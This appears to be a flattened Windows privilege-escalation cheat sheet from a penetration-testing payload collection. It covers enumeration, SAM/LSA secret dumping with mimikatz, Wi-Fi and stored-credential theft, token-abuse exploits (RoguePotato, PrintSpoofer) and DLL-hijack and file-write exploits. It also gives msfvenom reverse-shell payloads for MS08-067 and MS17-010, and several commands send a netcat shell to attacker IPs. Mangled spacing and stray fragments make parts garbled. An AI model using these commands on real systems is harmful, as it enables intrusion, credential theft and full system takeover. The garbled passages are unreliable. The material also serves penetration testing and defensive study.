# First obtain systeminfosysteminfosysteminfo > systeminfo.txt# Then feed it to wesngpython3 wes.py --update-wespython3 wes.py --updatepython3 wes.py systeminfo.txt
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
List all env variables
setGet-ChildItem Env: | ft Key,Value
List all drives
wmic logicaldisk get caption || fsutil fsinfo driveswmic logicaldisk get caption,description,providernameGet-PSDrive|where {$_.Provider-like"Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
User Enumeration
Get current username
echo %USERNAME% || whoami$env:username
List user privilege
whoami /privwhoami /groups
List all users
net userwhoami /allGet-LocalUser| ft Name,Enabled,LastLogonGet-ChildItem C:\Users -Force | select Name
List logon requirements; useable for bruteforcing
net accounts
Get details about a user (i.e. administrator, admin, current user)
net user administratornet user adminnet user %USERNAME%
List all local groups
net localgroupGet-LocalGroup| ft Name
Get details about a group (i.e. administrators)
net localgroup administratorsGet-LocalGroupMember Administrators | ft Name, PrincipalSourceGet-LocalGroupMember Administrateurs | ft Name, PrincipalSource
The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
# Usually %SYSTEMROOT% = C:\Windows%SYSTEMROOT%\repair\SAM%SYSTEMROOT%\System32\config\RegBack\SAM%SYSTEMROOT%\System32\config\SAM%SYSTEMROOT%\repair\system%SYSTEMROOT%\System32\config\SYSTEM%SYSTEMROOT%\System32\config\RegBack\system
Generate a hash file for John using pwdump or samdump2.
pwdump SYSTEM SAM >/root/sam.txtsamdump2 SYSTEM SAM -o sam.txt
Either crack it with john -format=NT /root/sam.txt, hashcat or use Pass-The-Hash.
HiveNightmare
CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user
Check for the vulnerability using icacls
C:\Windows\System32> icacls config\SAMconfig\SAM BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) <-- this is wrong - regular users should not have read access!
Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it.
mimikatz> token::whoami /full# List shadow copies availablemimikatz> misc::shadowcopies# Extract account from SAM databasesmimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM# Extract secrets from SECURITYmimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
LAPS Settings
Extract HKLM\Software\Policies\Microsoft Services\AdmPwd from Windows Registry.
LAPS Enabled: AdmPwdEnabled
LAPS Admin Account Name: AdminAccountName
LAPS Password Complexity: PasswordComplexity
LAPS Password Length: PasswordLength
LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
Also search in remote places such as SMB Shares and SharePoint:
Search passwords in SharePoint: nheiniger/SnaffPoint (must be compiled first, for referencing issue see: https://github.com/nheiniger/SnaffPoint/pull/6)
# First, retrieve a token## Method 1: using SnaffPoint binary$token = (.\GetBearerToken.exe https://your.sharepoint.com)## Method 2: using AADInternalsInstall-Module AADInternals -Scope CurrentUserImport-Module AADInternals$token = (Get-AADIntAccessToken-ClientId "9bc3ab49-b65d-410a-85ad-de819febfddc"-Tenant "your.onmicrosoft.com"-Resource "https://your.sharepoint.com")# Second, search on Sharepoint## Method 1: using search strings in ./presets dir.\SnaffPoint.exe-u "https://your.sharepoint.com"-t $token## Method 2: using search string in command line### -l uses FQL search, see: https://learn.microsoft.com/en-us/sharepoint/dev/general-development/fast-query-language-fql-syntax-reference.\SnaffPoint.exe-u "https://your.sharepoint.com"-t $token -l -q "filename:.config"
Oneliner method to extract wifi passwords from all the access point.
cls&echo. &for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear |findstr"SSID Cipher Content"|find /v "Number"&echo.) &@echoon
Sticky Notes passwords
The sticky notes app stores it's content in a sqlite db located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Passwords stored in services
Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using SessionGopher
Get-ChildItem'C:\Program Files','C:\Program Files (x86)'| ft Parent,Name,LastWriteTimeGet-ChildItem-path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
List services
net startwmic service list brieftasklist /SVC
Enumerate scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskNameschtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run"| grep -B 1 SYSTEMGet-ScheduledTask|where {$_.TaskPath-notlike"\Microsoft*"} | ft TaskName,TaskPath,State
Startup tasks
wmic startup get caption,commandreg query HKLM\Software\Microsoft\Windows\CurrentVersion\Rreg query HKCU\Software\Microsoft\Windows\CurrentVersion\Runreg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOncedir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
EoP - Incorrect permissions in services
A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system.
Often, services are pointing to writeable locations:
Orphaned installs, not installed anymore but still exist in startup
With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ .exe --default-user root. Now start your bind shell or reverse.
Binary bash.exe can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
Alternatively you can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
EoP - Unquoted Service Paths
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
wmic service get name,displayname,pathname,startmode |findstr /i "Auto"|findstr /i /v "C:\Windows\\"|findstr /i /v """wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode |Where {$_.StartMode-eq"Auto"-and$_.PathName-notlike"C:\Windows*"-and$_.PathName-notlike'"*'} | select PathName,DisplayName,Name
For C:\Program Files\something\legit.exe, Windows will try the following paths first:
C:\Program.exe
C:\Program Files.exe
EoP - $PATH Interception
Requirements:
PATH contains a writeable folder with low privileges.
The writeable folder is before the folder that contains the legitimate binary.
EXAMPLE:
# List contents of the PATH environment variable# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32$env:Path# See permissions of the target folder# EXAMPLE OUTPUT: BUILTIN\Users: GR,GWicacls.exe"C:\Program Files\nodejs\"# Place our evil-file in that folder.copy evil-file.exe"C:\Program Files\nodejs\cmd.exe"
Because (in this example) "C:\Program Files\nodejs" is before "C:\WINDOWS\system32" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder.
EoP - Named Pipes
Find named pipes: [System.IO.Directory]::GetFiles("\\.\pipe\")
Check named pipes DACL: pipesec.exe <named_pipe>
Reverse engineering software
Send data throught the named pipe : program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe
Using the reg query command, you can check the status of the AlwaysInstallElevated registry key for both the user and the machine. If both queries return a value of 0x1, then AlwaysInstallElevated is enabled for both user and machine, indicating the system is vulnerable.
Custom Actions in MSI allow developers to specify scripts or executables to be run at various points during an installation
mgeeky/msidump - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner.
activescott/lessmsi - A tool to view and extract the contents of an Windows Installer (.msi) file.
mandiant/msi-search - This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file.
Enumerate products on the machine
wmic product get identifyingnumber,name,vendor,version
Execute the repair process with the /fa parameter to trigger the CustomActions. We can use both IdentifyingNumber {E0F1535A-8414-5EF1-A1DD-E17EDCDC63F1} or path to the installer c:\windows\installer\XXXXXXX.msi. The repair will run with the NT SYSTEM account.
Application running as SYSTEM allowing an user to spawn a CMD, or browse directories.
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
EoP - Evaluating Vulnerable Drivers
Look for vuln drivers loaded, we often don't spend enough time looking at this:
Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats.
Native binary: DriverQuery.exe
PS C:\Users\Swissky>driverquery.exe/fo table /siModule Name Display Name Driver Type Link Date=====================================================================1394ohci 1394 OHCI Compliant Ho Kernel 12/10/20064:44:38 PM3ware 3ware Kernel 5/18/20156:28:03 PMACPI Microsoft ACPI Driver Kernel 12/9/19756:17:08 AMAcpiDev ACPI Devices driver Kernel 12/7/19936:22:19 AMacpiex Microsoft ACPIEx Drive Kernel 3/1/20878:53:50 AMacpipagr ACPI Processor Aggrega Kernel 1/24/20818:36:36 AMAcpiPmi ACPI Power Meter Drive Kernel 11/19/20069:20:15 PMacpitime ACPI Wake Alarm Driver Kernel 2/9/19747:10:30 AMADP80XX ADP80XX Kernel 4/9/20154:49:48 PM<SNIP>
Then you can use runas with the /savecred options in order to use the saved credentials. The following example is calling a remote binary via an SMB share.
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation.
# List shadow copies using vssadmin (Needs Admnistrator Access)vssadmin list shadows# List shadow copies using diskshadowdiskshadow list shadows all# Make a symlink to the shadow copy and access itmklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
EoP - From local administrator to NT SYSTEM
PsExec.exe-i -s cmd.exe
EoP - Living Off The Land Binaries and Scripts
Living Off The Land Binaries and Scripts (and also Libraries) : https://lolbas-project.github.io/
The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.
A LOLBin/Lib/Script must:
Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. Have extra "unexpected" functionality. It is not interesting to document intended use cases. Exceptions are application whitelisting bypasses
Have functionality that would be useful to an APT or red team
Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.
Privilege
Impact
Tool
Execution path
Remarks
SeAssignPrimaryToken
Admin
3rd party tool
"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"
SeBackup
Threat
Built-in commands
Read sensitve files with robocopy /b
- May be more interesting if you can read %WINDIR%\MEMORY.DMP
- SeBackupPrivilege (and robocopy) is not helpful when it comes to open files.
- Robocopy requires both SeBackup and SeRestore to work with /b parameter.
SeCreateToken
Admin
3rd party tool
Create arbitrary token including local admin rights with NtCreateToken.
SeDebug
Admin
PowerShell
Duplicate the lsass.exe token.
SeLoadDriver
Admin
3rd party tool
1. Load buggy kernel driver such as szkg64.sys or capcom.sys
2. Exploit the driver vulnerability
Alternatively, the privilege may be used to unload security-related drivers with ftlMC builtin command. i.e.: fltMC sysmondrv
SeRestore
Admin
PowerShell
Attack may be detected by some AV software.
Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
SeTakeOwnership
Admin
Built-in commands
1. takeown.exe /f "%windir%\system32"
2. icalcs.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U
Attack may be detected by some AV software.
Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
SeTcb
Admin
3rd party tool
Manipulate tokens to have local admin rights included. May require SeImpersonate.
To be verified.
SeRelabel
Admin
3rd party too
Allows you to own resources that have an integrity level even higher than your own
Restore A Service Account's Privileges
This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
# https://github.com/itm4n/FullPowersc:\TOOLS>FullPowers[+] Started dummy thread with id 9976[+] Successfully created scheduled task.[+] Got new token! Privilege count: 7[+] CreateProcessAsUser() OKMicrosoft Windows [Version10.0.19041.84](c) 2019 Microsoft Corporation. All rights reserved.C:\WINDOWS\system32>whoami /privPRIVILEGES INFORMATION----------------------Privilege Name Description State=============================================================================SeAssignPrimaryTokenPrivilege Replace a process level token EnabledSeIncreaseQuotaPrivilege Adjust memory quotas for a process EnabledSeAuditPrivilege Generate security audits EnabledSeChangeNotifyPrivilege Bypass traverse checking EnabledSeImpersonatePrivilege Impersonate a client after authentication EnabledSeCreateGlobalPrivilege Create global objects EnabledSeIncreaseWorkingSetPrivilege Increase a process working set Enabledc:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd"-z
If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato
If the machine is < Windows 10 1809 < Windows Server 2019 - Try Juicy Potato
# Network redirector / port forwarder to run on your remote machine, must use port 135 as src portsocat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. # Use this if you have fw restrictions.RoguePotato.exe-r 10.0.0.3-e "C:\windows\system32\cmd.exe"# RoguePotato all in one with RogueOxidResolver running locally on port 9999RoguePotato.exe-r 10.0.0.3-e "C:\windows\system32\cmd.exe"-l 9999#RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipenameRoguePotato.exe-r 10.0.0.3-e "C:\windows\system32\cmd.exe"-l 9999-c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}"-p splintercode
EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
Binary available at https://github.com/zcgonvh/EfsPotato
Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
# run nc -lnvp 443 then :.\PrintSpoofer64.exe-c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd"# without listener.\PrintSpoofer64.exe-i -c cmd# Via RPD.\PrintSpoofer64.exe-d 3-c "powershell -ep bypass"
EoP - Privileged File Write
DiagHub
The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM. This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the C:\Windows\System32 directory.
Exploit
Create an evil DLL e.g: payload.dll and move it into C:\Windows\System32
Build https://github.com/xct/diaghub
diaghub.exe c:\\ProgramData\\ payload.dll
The default payload will run C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe
An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo)
If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of windowscoredeviceinfo.dll into C:\Windows\Sytem32\ and then have it loaded by the USO service to get arbitrary code execution as NT AUTHORITY\System.
Exploit
Build https://github.com/itm4n/UsoDllLoader
Select Release config and x64 architecure.
Build solution.
DLL .\x64\Release\WindowsCoreDeviceInfo.dll
Loader .\x64\Release\UsoDllLoader.exe.
Copy WindowsCoreDeviceInfo.dll to C:\Windows\System32\
Use the loader and wait for the shell or run usoclient StartInteractiveScan and connect to the bind shell on port 1337.
WerTrigger
Exploit Privileged File Writes bugs with Windows Problem Reporting
Clone https://github.com/sailay1996/WerTrigger
Copy phoneinfo.dll to C:\Windows\System32\
Place Report.wer file and WerTrigger.exe in a same directory.
Then, run WerTrigger.exe.
Enjoy a shell as NT AUTHORITY\SYSTEM
WerMgr
Exploit Privileged Directory Creation Bugs with Windows Error Reporting
Grant access to it: cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f
Place spawn.dll file and dircreate2system.exe in a same directory and run .\dircreate2system.exe.
Enjoy a shell as NT AUTHORITY\SYSTEM
EoP - Privileged File Delete
During an MSI installation, the Windows Installer service maintains a record of every changes in case it needs to be rolled back, to do that it will create:
a folder at C:\Config.Msi containing
a rollback script (.rbs)
a rollback file (.rbf)
To convert a privileged file delete to a local privilege escalation, you need to abuse the Windows Installer service.
delete the protected C:\Config.Msi folder immediately after it's created by the Windows Installer
recreate the C:\Config.Msi folder with weak DACL permissions since ordinary users are allowed to create folders at the root of C:\.
drop malicious .rbs and .rbf files into it to be executed by the MSI rollback
then upon rollback, Windows Installer will make arbitrary changes to the system
The easiest way to trigger this chain is using thezdi/FilesystemEoPs/FolderOrFileDeleteToSystem. The exploit contains a .msi file with 2 actions, the first one produces a delay and the second throws an error to make it rollback. This rollback will "restore" a malicious HID.dll in C:\Program Files\Common Files\microsoft shared\ink\HID.dll.
Then switch to the secure desktop using [CTRL]+[ALT]+[DELETE] and open the On-Screen Keyboard (osk.exe). The osk.exe process first looks for the C:\Program Files\Common Files\microsoft shared\ink\HID.dll library instead of C:\Windows\System32\HID.dll
EoP - Common Vulnerabilities and Exposure
MS08-067 (NetAPI)
Check the vulnerability with the following nmap script.
If you can't use Metasploit and only want a reverse shell.
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.pymsfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"-f py -v shellcode -a x86 --platform windowsExample: MS08_067_2018.py 192.168.1.11445--for Windows XP SP0/SP1 Universal, port 445Example: MS08_067_2018.py 192.168.1.12139--for Windows 2000 Universal, port 139 (445 could also be used)Example: MS08_067_2018.py 192.168.1.13445--for Windows 2003 SP0 UniversalExample: MS08_067_2018.py 192.168.1.14445--for Windows 2003 SP1 EnglishExample: MS08_067_2018.py 192.168.1.15445--for Windows XP SP3 French (NX)Example: MS08_067_2018.py 192.168.1.16445--for Windows XP SP3 English (NX)Example: MS08_067_2018.py 192.168.1.17445--for Windows XP SP3 English (AlwaysOn NX)python ms08-067.py 10.0.0.16445
MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7
'KiTrap0D' User Mode to Ring Escalation (MS10-015)
Metasploit modules to exploit EternalRomance/EternalSynergy/EternalChampion.
auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Executionauxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detectionexploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruptionexploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
If you can't use Metasploit and only want a reverse shell.
git clone https://github.com/helviojunior/MS17-010# generate a simple reverse shell to usemsfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exepython2 send_and_execute.py 10.0.0.1revshell.exe
Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
Thank you for the update. I will try to re-phrase it to something more recipe-like soon.
Script to be found at
1. The szkg64 vulnerability is listed as
2. The szkg64 was created by
1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with ).
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U
Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs.
2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview.